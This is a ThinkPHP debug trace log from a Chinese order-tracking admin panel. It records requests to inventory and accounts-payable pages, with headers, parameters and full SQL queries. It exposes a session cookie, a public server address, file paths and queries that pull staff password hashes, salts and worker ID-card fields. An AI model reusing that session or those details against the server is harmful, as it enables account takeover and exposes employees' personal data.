--------------------------------------------------------------- [ 2025-12-14T16:34:21+08:00 ] 106.112.204.117 GET /admin/ordermge/putinstorage/index?sort=id&order=desc&offset=0&limit=10&filter=%7B%22start_time%22%3A%222025-11-14+00%3A00%3A00%22%2C%22end_time%22%3A%222025-12-14+23%3A59%3A59%22%7D&op=%7B%22start_time%22%3A%22%3D%22%2C%22end_time%22%3A%22%3D%22%7D&_=1765701207506 [ info ] 47.105.33.115:8081/admin/ordermge/putinstorage/index?sort=id&order=desc&offset=0&limit=10&filter=%7B%22start_time%22%3A%222025-11-14+00%3A00%3A00%22%2C%22end_time%22%3A%222025-12-14+23%3A59%3A59%22%7D&op=%7B%22start_time%22%3A%22%3D%22%2C%22end_time%22%3A%22%3D%22%7D&_=1765701207506 [运行时间:0.063223s][吞吐率:15.82req/s] [内存消耗:5,786.87kb] [文件加载:89] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000041s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001141s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'ordermge.putinstorage', 2 => 'index', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'accept' => 'application/json, text/javascript, */*; q=0.01', 'x-requested-with' => 'XMLHttpRequest', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'content-type' => 'application/json', 'referer' => 'http://47.105.33.115:8081/admin/ordermge/putinstorage?addtabs=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=24urn8pmghle20960cno2tm5g2', ) [ info ] [ PARAM ] array ( 'sort' => 'id', 'order' => 'desc', 'offset' => '0', 'limit' => '10', 'filter' => '{"start_time":"2025-11-14 00:00:00","end_time":"2025-12-14 23:59:59"}', 'op' => '{"start_time":"=","end_time":"="}', '_' => '1765701207506', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001463s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ DB ] INIT mysql [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/ordermge/putinstorage.php [ info ] [ RUN ] app\admin\controller\ordermge\Putinstorage->index[ /alidata/www/gendan/application/admin/controller/ordermge/Putinstorage.php ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000106s ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000482s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_group_access` [ RunTime:0.000722s ] [ sql ] [ SQL ] SELECT `aga`.`uid`,`aga`.`group_id`,`ag`.`id`,`ag`.`pid`,`ag`.`name`,`ag`.`rules` FROM `ot_auth_group_access` `aga` LEFT JOIN `ot_auth_group` `ag` ON `aga`.`group_id`=`ag`.`id` WHERE ( aga.uid='74' and ag.status='normal' ) [ RunTime:0.000410s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_rule` [ RunTime:0.000602s ] [ sql ] [ SQL ] SELECT `id`,`pid`,`condition`,`icon`,`name`,`title`,`ismenu` FROM `ot_auth_rule` WHERE `status` = 'normal' AND `id` IN (147,148,149,151,154,155,156,158,160,161,162,164,179,191,197,208,209,210,211,212,213,227,235,290,291,292,293,296,297,298,299,302,307,309,310,311,312,313,314,315,317,319,324,325,326,327,328,329,330,331,332,333,335,336,337,338,339,340,341,342,343,344,351,352,353,354,355,356,357,358,359,146,145,233,153,152,159,178,177,190,196,226,234,289,282,295,301,308,318,132) [ RunTime:0.001088s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_putinstorage` [ RunTime:0.001140s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_purchaseorder` [ RunTime:0.001202s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_suppliercustomer` [ RunTime:0.000761s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_staffinfo` [ RunTime:0.000824s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_material` [ RunTime:0.000871s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_factorymge` [ RunTime:0.000706s ] [ sql ] [ SQL ] SELECT COUNT(*) AS tp_count FROM `ot_putinstorage` `putinstorage` LEFT JOIN `ot_purchaseorder` `purchaseorder` ON `putinstorage`.`purchaseorder_id`=`purchaseorder`.`id` LEFT JOIN `ot_suppliercustomer` `suppliercustomer` ON `putinstorage`.`suppliercustomer_id`=`suppliercustomer`.`id` LEFT JOIN `ot_staffinfo` `staffinfo` ON `putinstorage`.`build_staffinfo_id`=`staffinfo`.`id` LEFT JOIN `ot_material` `material` ON `putinstorage`.`material_id`=`material`.`id` LEFT JOIN `ot_factorymge` `factorymge` ON `putinstorage`.`factorymge_id`=`factorymge`.`id` WHERE `putinstorage`.`factorymge_id` = '40' AND ( putinstorage.createtime > 1763049600 ) AND ( putinstorage.createtime <= 1765727999 ) AND `verify_status` = 0 ORDER BY `putinstorage`.`id` DESC LIMIT 1 [ RunTime:0.001900s ] [ sql ] [ SQL ] SELECT `putinstorage`.`id`,`putinstorage`.`number`,`putinstorage`.`purchaseorder_id`,`putinstorage`.`suppliercustomer_id`,`putinstorage`.`staffinfo_ids`,`putinstorage`.`build_staffinfo_id`,`putinstorage`.`material_id`,`putinstorage`.`factorymge_id`,`putinstorage`.`amount`,`putinstorage`.`price`,`putinstorage`.`money`,`putinstorage`.`verify_amount`,`putinstorage`.`verify_status`,`putinstorage`.`is_print`,`putinstorage`.`createtime`,`putinstorage`.`updatetime`,purchaseorder.id AS purchaseorder__id,purchaseorder.number AS purchaseorder__number,purchaseorder.supplier_factory_id AS purchaseorder__supplier_factory_id,purchaseorder.sup_order_id AS purchaseorder__sup_order_id,purchaseorder.material_id AS purchaseorder__material_id,purchaseorder.orderinfo_id AS purchaseorder__orderinfo_id,purchaseorder.order_amount AS purchaseorder__order_amount,purchaseorder.kucun_amount AS purchaseorder__kucun_amount,purchaseorder.amount AS purchaseorder__amount,purchaseorder.lingqu_amount AS purchaseorder__lingqu_amount,purchaseorder.daohuo_amount AS purchaseorder__daohuo_amount,purchaseorder.price AS purchaseorder__price,purchaseorder.suppliercustomer_id AS purchaseorder__suppliercustomer_id,purchaseorder.factorymge_id AS purchaseorder__factorymge_id,purchaseorder.admin_id AS purchaseorder__admin_id,purchaseorder.order_status AS purchaseorder__order_status,purchaseorder.build_time AS purchaseorder__build_time,purchaseorder.remind_day AS purchaseorder__remind_day,purchaseorder.end_time AS purchaseorder__end_time,purchaseorder.responsible_staffinfos AS purchaseorder__responsible_staffinfos,purchaseorder.responsible_staffinfovars AS purchaseorder__responsible_staffinfovars,purchaseorder.bind_pro_id AS purchaseorder__bind_pro_id,purchaseorder.bind_mat_id AS purchaseorder__bind_mat_id,purchaseorder.beizhu AS purchaseorder__beizhu,purchaseorder.feedback AS purchaseorder__feedback,purchaseorder.order_type AS purchaseorder__order_type,purchaseorder.guoqitime AS purchaseorder__guoqitime,purchaseorder.guoqi_status AS purchaseorder__guoqi_status,purchaseorder.createtime AS purchaseorder__createtime,purchaseorder.updatetime AS purchaseorder__updatetime,purchaseorder.is_modify AS purchaseorder__is_modify,suppliercustomer.id AS suppliercustomer__id,suppliercustomer.name AS suppliercustomer__name,suppliercustomer.phone AS suppliercustomer__phone,suppliercustomer.receiving_address AS suppliercustomer__receiving_address,suppliercustomer.source_fac_id AS suppliercustomer__source_fac_id,suppliercustomer.normalstatus AS suppliercustomer__normalstatus,suppliercustomer.factorymge_id AS suppliercustomer__factorymge_id,suppliercustomer.createtime AS suppliercustomer__createtime,suppliercustomer.updatetime AS suppliercustomer__updatetime,staffinfo.id AS staffinfo__id,staffinfo.name AS staffinfo__name,staffinfo.jobmge_id AS staffinfo__jobmge_id,staffinfo.accout_num AS staffinfo__accout_num,staffinfo.phone_num AS staffinfo__phone_num,staffinfo.accout_pwd AS staffinfo__accout_pwd,staffinfo.salt AS staffinfo__salt,staffinfo.staff_status AS staffinfo__staff_status,staffinfo.admin_id AS staffinfo__admin_id,staffinfo.factorymge_id AS staffinfo__factorymge_id,staffinfo.createtime AS staffinfo__createtime,staffinfo.updatetime AS staffinfo__updatetime,staffinfo.portrait AS staffinfo__portrait,material.id AS material__id,material.name AS material__name,material.number AS material__number,material.avatar AS material__avatar,material.amount AS material__amount,material.warn_amount AS material__warn_amount,material.occupy_amount AS material__occupy_amount,material.factorymge_id AS material__factorymge_id,material.is_stop_status AS material__is_stop_status,material.admin_id AS material__admin_id,material.price AS material__price,material.danwei AS material__danwei,material.quehuo_status AS material__quehuo_status,material.put_position AS material__put_position,material.is_has_sup AS material__is_has_sup,material.staff_ids AS material__staff_ids,material.staff_names AS material__staff_names,material.createtime AS material__createtime,material.updatetime AS material__updatetime,material.is_delete AS material__is_delete,factorymge.id AS factorymge__id,factorymge.name AS factorymge__name,factorymge.connect_name AS factorymge__connect_name,factorymge.phone_num AS factorymge__phone_num,factorymge.fax_num AS factorymge__fax_num,factorymge.build_order_yuan AS factorymge__build_order_yuan,factorymge.operator AS factorymge__operator,factorymge.city AS factorymge__city,factorymge.address AS factorymge__address,factorymge.en_switch AS factorymge__en_switch,factorymge.admin_id AS factorymge__admin_id,factorymge.createtime AS factorymge__createtime,factorymge.updatetime AS factorymge__updatetime FROM `ot_putinstorage` `putinstorage` LEFT JOIN `ot_purchaseorder` `purchaseorder` ON `putinstorage`.`purchaseorder_id`=`purchaseorder`.`id` LEFT JOIN `ot_suppliercustomer` `suppliercustomer` ON `putinstorage`.`suppliercustomer_id`=`suppliercustomer`.`id` LEFT JOIN `ot_staffinfo` `staffinfo` ON `putinstorage`.`build_staffinfo_id`=`staffinfo`.`id` LEFT JOIN `ot_material` `material` ON `putinstorage`.`material_id`=`material`.`id` LEFT JOIN `ot_factorymge` `factorymge` ON `putinstorage`.`factorymge_id`=`factorymge`.`id` WHERE `putinstorage`.`factorymge_id` = '40' AND ( putinstorage.createtime > 1763049600 ) AND ( putinstorage.createtime <= 1765727999 ) AND `verify_status` = 0 ORDER BY `putinstorage`.`verify_status` ASC,`putinstorage`.`id` DESC LIMIT 0,10 [ RunTime:0.002762s ] --------------------------------------------------------------- [ 2025-12-14T16:34:23+08:00 ] 106.112.204.117 GET /admin/financial/accountspayable?addtabs=1 [ info ] 47.105.33.115:8081/admin/financial/accountspayable?addtabs=1 [运行时间:0.052234s][吞吐率:19.14req/s] [内存消耗:5,286.25kb] [文件加载:81] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000041s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001219s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'financial.accountspayable', 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'upgrade-insecure-requests' => '1', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'referer' => 'http://47.105.33.115:8081/admin/financial/accountspayable?ref=addtabs', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=24urn8pmghle20960cno2tm5g2', ) [ info ] [ PARAM ] array ( 'addtabs' => '1', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001605s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ DB ] INIT mysql [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/financial/accountspayable.php [ info ] [ RUN ] app\admin\controller\financial\Accountspayable->index[ /alidata/www/gendan/application/admin/controller/financial/Accountspayable.php ] [ info ] [ VIEW ] /alidata/www/gendan/public/../application/admin/view/financial/accountspayable/index.html [ array ( 0 => 'breadcrumb', 1 => 'site', 2 => 'config', 3 => 'auth', 4 => 'admin', 5 => 'adminid', 6 => 'faccount', 7 => 'subjectTypeList', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000101s ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000405s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_group_access` [ RunTime:0.000879s ] [ sql ] [ SQL ] SELECT `aga`.`uid`,`aga`.`group_id`,`ag`.`id`,`ag`.`pid`,`ag`.`name`,`ag`.`rules` FROM `ot_auth_group_access` `aga` LEFT JOIN `ot_auth_group` `ag` ON `aga`.`group_id`=`ag`.`id` WHERE ( aga.uid='74' and ag.status='normal' ) [ RunTime:0.000446s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_rule` [ RunTime:0.000786s ] [ sql ] [ SQL ] SELECT `id`,`pid`,`condition`,`icon`,`name`,`title`,`ismenu` FROM `ot_auth_rule` WHERE `status` = 'normal' AND `id` IN (147,148,149,151,154,155,156,158,160,161,162,164,179,191,197,208,209,210,211,212,213,227,235,290,291,292,293,296,297,298,299,302,307,309,310,311,312,313,314,315,317,319,324,325,326,327,328,329,330,331,332,333,335,336,337,338,339,340,341,342,343,344,351,352,353,354,355,356,357,358,359,146,145,233,153,152,159,178,177,190,196,226,234,289,282,295,301,308,318,132) [ RunTime:0.001088s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_factorymge` [ RunTime:0.000890s ] [ sql ] [ SQL ] SELECT * FROM `ot_factorymge` WHERE `admin_id` = 74 [ RunTime:0.000321s ] [ sql ] [ SQL ] SELECT `title`,`remark` FROM `ot_auth_rule` WHERE `name` = 'financial/accountspayable' LIMIT 1 [ RunTime:0.000264s ] --------------------------------------------------------------- [ 2025-12-14T16:34:24+08:00 ] 106.112.204.117 GET /admin/ajax/lang?callback=define&controllername=financial.accountspayable&v=1765701263 [ info ] 47.105.33.115:8081/admin/ajax/lang?callback=define&controllername=financial.accountspayable&v=1765701263 [运行时间:0.032234s][吞吐率:31.02req/s] [内存消耗:3,855.01kb] [文件加载:72] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000052s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001212s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'ajax', 2 => 'lang', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'accept' => '*/*', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'referer' => 'http://47.105.33.115:8081/admin/financial/accountspayable?addtabs=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=24urn8pmghle20960cno2tm5g2', ) [ info ] [ PARAM ] array ( 'callback' => 'define', 'controllername' => 'financial.accountspayable', 'v' => '1765701263', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001548s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/ajax.php [ info ] [ RUN ] app\admin\controller\Ajax->lang[ /alidata/www/gendan/application/admin/controller/Ajax.php ] [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/financial/accountspayable.php [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000097s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T16:34:24+08:00 ] 106.112.204.117 GET /admin/financial/accountspayable/index?sort=id&order=desc&offset=0&limit=10&filter=%7B%22subject_type%22%3A%220%22%7D&op=%7B%22subject_type%22%3A%22LIKE%22%7D&_=1765701265747 [ info ] 47.105.33.115:8081/admin/financial/accountspayable/index?sort=id&order=desc&offset=0&limit=10&filter=%7B%22subject_type%22%3A%220%22%7D&op=%7B%22subject_type%22%3A%22LIKE%22%7D&_=1765701265747 [运行时间:0.071453s][吞吐率:14.00req/s] [内存消耗:5,713.66kb] [文件加载:88] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000036s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001124s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'financial.accountspayable', 2 => 'index', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'accept' => 'application/json, text/javascript, */*; q=0.01', 'x-requested-with' => 'XMLHttpRequest', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'content-type' => 'application/json', 'referer' => 'http://47.105.33.115:8081/admin/financial/accountspayable?addtabs=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=24urn8pmghle20960cno2tm5g2', ) [ info ] [ PARAM ] array ( 'sort' => 'id', 'order' => 'desc', 'offset' => '0', 'limit' => '10', 'filter' => '{"subject_type":"0"}', 'op' => '{"subject_type":"LIKE"}', '_' => '1765701265747', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001520s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ DB ] INIT mysql [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/financial/accountspayable.php [ info ] [ RUN ] app\admin\controller\financial\Accountspayable->index[ /alidata/www/gendan/application/admin/controller/financial/Accountspayable.php ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000101s ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000524s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_group_access` [ RunTime:0.000683s ] [ sql ] [ SQL ] SELECT `aga`.`uid`,`aga`.`group_id`,`ag`.`id`,`ag`.`pid`,`ag`.`name`,`ag`.`rules` FROM `ot_auth_group_access` `aga` LEFT JOIN `ot_auth_group` `ag` ON `aga`.`group_id`=`ag`.`id` WHERE ( aga.uid='74' and ag.status='normal' ) [ RunTime:0.000387s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_rule` [ RunTime:0.000634s ] [ sql ] [ SQL ] SELECT `id`,`pid`,`condition`,`icon`,`name`,`title`,`ismenu` FROM `ot_auth_rule` WHERE `status` = 'normal' AND `id` IN (147,148,149,151,154,155,156,158,160,161,162,164,179,191,197,208,209,210,211,212,213,227,235,290,291,292,293,296,297,298,299,302,307,309,310,311,312,313,314,315,317,319,324,325,326,327,328,329,330,331,332,333,335,336,337,338,339,340,341,342,343,344,351,352,353,354,355,356,357,358,359,146,145,233,153,152,159,178,177,190,196,226,234,289,282,295,301,308,318,132) [ RunTime:0.000949s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_factorymge` [ RunTime:0.000736s ] [ sql ] [ SQL ] SELECT * FROM `ot_factorymge` WHERE `admin_id` = 74 [ RunTime:0.000272s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_accountspayable` [ RunTime:0.000665s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_suppliercustomer` [ RunTime:0.000586s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_worker` [ RunTime:0.000753s ] [ sql ] [ SQL ] SELECT COUNT(*) AS tp_count FROM `ot_accountspayable` `accountspayable` LEFT JOIN `ot_suppliercustomer` `suppliercustomer` ON `accountspayable`.`suppliercustomer_id`=`suppliercustomer`.`id` LEFT JOIN `ot_factorymge` `factorymge` ON `accountspayable`.`factorymge_id`=`factorymge`.`id` LEFT JOIN `ot_worker` `worker` ON `accountspayable`.`worker_id`=`worker`.`id` WHERE `accountspayable`.`factorymge_id` = '40' AND ( 1=1 ) ORDER BY `accountspayable`.`id` DESC LIMIT 1 [ RunTime:0.013102s ] [ sql ] [ SQL ] SELECT `accountspayable`.`id`,`accountspayable`.`money`,`accountspayable`.`paid_money`,`accountspayable`.`yu_money`,`accountspayable`.`subject_type`,`accountspayable`.`putinstorage_id`,`accountspayable`.`amount`,`accountspayable`.`suppliercustomer_id`,`accountspayable`.`sour_fac_id`,`accountspayable`.`staffinfo_id`,`accountspayable`.`build_staffinfo_id`,`accountspayable`.`orderinfo_id`,`accountspayable`.`purchaseorder_id`,`accountspayable`.`worker_id`,`accountspayable`.`worker_name`,`accountspayable`.`explain`,`accountspayable`.`year`,`accountspayable`.`month`,`accountspayable`.`day`,`accountspayable`.`factorymge_id`,`accountspayable`.`createtime`,`accountspayable`.`updatetime`,suppliercustomer.id AS suppliercustomer__id,suppliercustomer.name AS suppliercustomer__name,suppliercustomer.phone AS suppliercustomer__phone,suppliercustomer.receiving_address AS suppliercustomer__receiving_address,suppliercustomer.source_fac_id AS suppliercustomer__source_fac_id,suppliercustomer.normalstatus AS suppliercustomer__normalstatus,suppliercustomer.factorymge_id AS suppliercustomer__factorymge_id,suppliercustomer.createtime AS suppliercustomer__createtime,suppliercustomer.updatetime AS suppliercustomer__updatetime,factorymge.id AS factorymge__id,factorymge.name AS factorymge__name,factorymge.connect_name AS factorymge__connect_name,factorymge.phone_num AS factorymge__phone_num,factorymge.fax_num AS factorymge__fax_num,factorymge.build_order_yuan AS factorymge__build_order_yuan,factorymge.operator AS factorymge__operator,factorymge.city AS factorymge__city,factorymge.address AS factorymge__address,factorymge.en_switch AS factorymge__en_switch,factorymge.admin_id AS factorymge__admin_id,factorymge.createtime AS factorymge__createtime,factorymge.updatetime AS factorymge__updatetime,worker.id AS worker__id,worker.name AS worker__name,worker.phone AS worker__phone,worker.IDcard AS worker__IDcard,worker.salary AS worker__salary,worker.factorymge_id AS worker__factorymge_id,worker.createtime AS worker__createtime,worker.updatetime AS worker__updatetime,worker.is_del AS worker__is_del FROM `ot_accountspayable` `accountspayable` LEFT JOIN `ot_suppliercustomer` `suppliercustomer` ON `accountspayable`.`suppliercustomer_id`=`suppliercustomer`.`id` LEFT JOIN `ot_factorymge` `factorymge` ON `accountspayable`.`factorymge_id`=`factorymge`.`id` LEFT JOIN `ot_worker` `worker` ON `accountspayable`.`worker_id`=`worker`.`id` WHERE `accountspayable`.`factorymge_id` = '40' AND ( 1=1 ) ORDER BY `accountspayable`.`id` DESC LIMIT 0,10 [ RunTime:0.000512s ] --------------------------------------------------------------- [ 2025-12-14T16:34:26+08:00 ] 106.112.204.117 GET /admin/financial/accountspayable/add?dialog=1 [ info ] 47.105.33.115:8081/admin/financial/accountspayable/add?dialog=1 [运行时间:0.047044s][吞吐率:21.26req/s] [内存消耗:5,291.16kb] [文件加载:81] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000037s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001124s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'financial.accountspayable', 2 => 'add', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'upgrade-insecure-requests' => '1', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'referer' => 'http://47.105.33.115:8081/admin/financial/accountspayable?addtabs=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=24urn8pmghle20960cno2tm5g2', ) [ info ] [ PARAM ] array ( 'dialog' => '1', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001478s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ DB ] INIT mysql [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/financial/accountspayable.php [ info ] [ RUN ] app\admin\controller\financial\Accountspayable->add[ /alidata/www/gendan/application/admin/controller/financial/Accountspayable.php ] [ info ] [ VIEW ] /alidata/www/gendan/public/../application/admin/view/financial/accountspayable/add.html [ array ( 0 => 'breadcrumb', 1 => 'site', 2 => 'config', 3 => 'auth', 4 => 'admin', 5 => 'adminid', 6 => 'faccount', 7 => 'subjectTypeList', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000111s ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000480s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_group_access` [ RunTime:0.000729s ] [ sql ] [ SQL ] SELECT `aga`.`uid`,`aga`.`group_id`,`ag`.`id`,`ag`.`pid`,`ag`.`name`,`ag`.`rules` FROM `ot_auth_group_access` `aga` LEFT JOIN `ot_auth_group` `ag` ON `aga`.`group_id`=`ag`.`id` WHERE ( aga.uid='74' and ag.status='normal' ) [ RunTime:0.000432s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_rule` [ RunTime:0.000591s ] [ sql ] [ SQL ] SELECT `id`,`pid`,`condition`,`icon`,`name`,`title`,`ismenu` FROM `ot_auth_rule` WHERE `status` = 'normal' AND `id` IN (147,148,149,151,154,155,156,158,160,161,162,164,179,191,197,208,209,210,211,212,213,227,235,290,291,292,293,296,297,298,299,302,307,309,310,311,312,313,314,315,317,319,324,325,326,327,328,329,330,331,332,333,335,336,337,338,339,340,341,342,343,344,351,352,353,354,355,356,357,358,359,146,145,233,153,152,159,178,177,190,196,226,234,289,282,295,301,308,318,132) [ RunTime:0.001072s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_factorymge` [ RunTime:0.000710s ] [ sql ] [ SQL ] SELECT * FROM `ot_factorymge` WHERE `admin_id` = 74 [ RunTime:0.000276s ] --------------------------------------------------------------- [ 2025-12-14T16:34:26+08:00 ] 106.112.204.117 GET /admin/ajax/lang?callback=define&controllername=financial.accountspayable&v=1765701266 [ info ] 47.105.33.115:8081/admin/ajax/lang?callback=define&controllername=financial.accountspayable&v=1765701266 [运行时间:0.030129s][吞吐率:33.19req/s] [内存消耗:3,854.57kb] [文件加载:72] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000036s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001129s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'ajax', 2 => 'lang', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'accept' => '*/*', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'referer' => 'http://47.105.33.115:8081/admin/financial/accountspayable/add?dialog=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=24urn8pmghle20960cno2tm5g2', ) [ info ] [ PARAM ] array ( 'callback' => 'define', 'controllername' => 'financial.accountspayable', 'v' => '1765701266', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001492s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/ajax.php [ info ] [ RUN ] 